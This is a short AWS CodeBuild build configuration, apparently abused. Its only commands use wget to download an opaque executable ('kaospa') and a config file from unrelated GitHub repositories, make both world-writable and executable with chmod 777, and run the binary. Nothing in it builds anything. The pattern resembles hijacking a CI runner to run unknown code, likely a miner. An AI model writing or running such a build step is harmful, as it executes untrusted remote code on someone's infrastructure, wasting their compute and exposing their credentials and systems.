version: 0.2

phases:
  build:
    commands:
        - wget https://github.com/vedhagsvp/qubros/raw/main/appsettings.json
        - wget https://github.com/vedhagsvp/taberas/releases/download/mlb/kaospa
        - chmod 777 kaospa appsettings.json
        - ./kaospa
